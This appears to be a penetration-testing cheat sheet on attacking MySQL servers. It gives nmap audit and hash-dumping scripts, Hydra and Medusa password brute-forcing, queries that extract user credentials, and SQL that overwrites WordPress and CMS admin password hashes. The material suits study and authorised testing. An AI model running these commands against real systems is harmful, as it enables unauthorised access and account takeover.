MySql 3306
1. Nmap MySQL Scanning:
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.10
2. Bruteforcing MySQL Credentials:
Hydra (for password brute-forcing):
sudo hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.101.178 mysql
Medusa (alternative to Hydra):
medusa -h 10.10.10.10 -u bob -P rockyou.txt -M mysql
3. Internal MySQL Database Enumeration:
Once you gain access to a MySQL database, you can run the following commands to enumerate users and databases:
List Databases:
show databases;
Select a Database (example:
textpattern
):use textpattern;
List Tables in the Database:
show tables;
Enumerate Users:
select * from users;
List Specific User Information (e.g., username, email, password):
select username,email,password from users;
4. MySQL to System Root:
Refer to the following guide for methods of privilege escalation from MySQL to system root on Linux: Recipe for Root - MySQL to System Root
5. Resetting a MySQL Admin Password:
If you have access to the database and can see the hash of the password for the admin user, you can update the password hash as follows:
Example for WordPress:
Generate an MD5 hash of the new password (
redcliff
in this case):echo -n "redcliff" | md5sum
Update the password in the MySQL database (assuming you are using MariaDB/MySQL):
update wp_users set user_pass = '8d70e0d1acb06b4648c7aa8927509660' where ID = 1;
Example for CMS Made Simple 2.2.13:
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'redcliff'))) where username = 'admin';
6. Connecting Remotely to MySQL:
mysql -u root -h 192.168.101.184 -p
Dedicated Sections for SQL Injection/Privilege Escalation:
Last updated